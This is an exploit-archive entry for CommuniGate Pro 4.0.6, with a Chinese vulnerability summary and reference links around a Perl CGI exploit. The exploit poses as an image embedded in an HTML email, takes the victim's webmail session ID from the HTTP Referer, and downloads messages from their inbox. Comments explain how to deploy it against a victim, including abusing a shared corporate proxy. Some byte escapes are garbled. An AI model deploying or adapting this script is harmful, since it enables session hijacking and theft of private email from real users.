https://www.exploit-db.com/exploits/27
https://cxsecurity.com/issue/WLB-2007100111
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200312-077

CommuniGatePro3.1到4.0.6版本将会话ID发送给图像HTTP请求的参照字段。远程攻击者借助带IMG标签的电子邮件劫持邮件会话，该标签引用了捕获参照页的恶意URL。

#!/usr/bin/perl

# Below is exploit code. Place it into cgi-bin, then
# (recommended) make symlink from
# DocumentRoot/AnyImage.gif to shj.pl, configure
# at least $url variable, and possible other vars and
# send victim HTML message with img src to your
# AnyImage.gif. When victim will read message, script
# will download messages 1..10 from his mailbox (if
# sucessfull).

# Script will work even if "require fixed address" option
# enabled (set $abuseproxy=1), but it needs access to
# users proxy (IP will be detected automatically). So, if
# your victim uses same corporate proxy as you, then 
# you're lucky, you can own his mailbox! :)

# If victim uses HTTPS to access CGP webmail, use
# https:// link to image. some browsers will still send
# HTTP_REFERER if _both_ sites are https.
#
# session hijacking and mail downloading exploit for CommuniGatePro 4.0.6
#
# Yaroslav Polyakov. [email protected] www.sysAttack.com
#

use LWP::UserAgent;

# configuration vars
$logfile="/tmp/log";
$url="http://COMMUNIGATE/Session/%SID%/Message.wssp?Mailbox=INBOX&MSG=%N%";
$SIDREGEXP="Session/([0-9a-zA-Z-]+)/";
$msglonum=1;
$msghinum=10;
$msgprefix="/tmp/hijacked-";
$abuseproxy=1;
$proxyport=3128;

sub printgif
{
$gif1x1="x47x49x46x38x39x61x01x00x01x00x80xffx00xc0xc0xc0
x00x00x00x21xf9x04x01x00x00x00x00x2cx00x00x00x00
x01x00x01x00x00x02x02x44x01x00x3b";


  print "Content-Type: image/gifn";
  print "n";
  print "$gif1x1";
}


open LOG, "> $logfile" || die("cant write to my log");
printgif;



$remote=$ENV{'REMOTE_ADDR'};
$referer=$ENV{'HTTP_REFERER'};
print LOG "remote: $remotenreferer: $referern";
# if($referer=~/SID=([0-9a-zA-Z-]+)/){
if($referer=~/$SIDREGEXP/){
                $SID=$1;
                print LOG "SID: $SIDn";
                }else{
                                print LOG "sorry, cant
find out SIDn";
                                exit;
                }



# create request
my $ua = new LWP::UserAgent;
$ua->agent("shj - sysAttack CGP session HiJack/1.0");

if($abuseproxy){
                print LOG "set proxy
http://$remote:$proxyport/n";
                $ua->proxy('http',
"http://$remote:$proxyport/");
}

for($index=$msglonum;$index<=$msghinum;$index++){
               $eurl=$url;
                $eurl =~ s/%N%/$index/;
                $eurl =~ s/%SID%/$SID/;
                print LOG "fetching $eurln";
                $request = new HTTP::Request("GET", $eurl);
                $response = $ua->request($request);
                if($response){
                                print LOG
$response->code." ".$response->message
."n";
                                open MSG, ">
$msgprefix$index" or die('cant crea
te $msgprefix$index');
                                print MSG
$response->content;
                                close MSG;
                }else{
                                print LOG "undefined
responsen";
                }
}
close LOG;



# milw0rm.com [2003-05-05]

来源:BID
名称:7501
链接:http://www.securityfocus.com/bid/7501
来源:XF
名称:communigate-pro-session-hijacking(11932)
链接:http://xforce.iss.net/xforce/xfdb/11932
来源:BUGTRAQ
名称:20030504CommuniGatePro4.0.6[EXPLOIT]
链接:http://www.securityfocus.com/archive/1/320438
来源:SREASON
名称:3290
链接:http://securityreason.com/securityalert/3290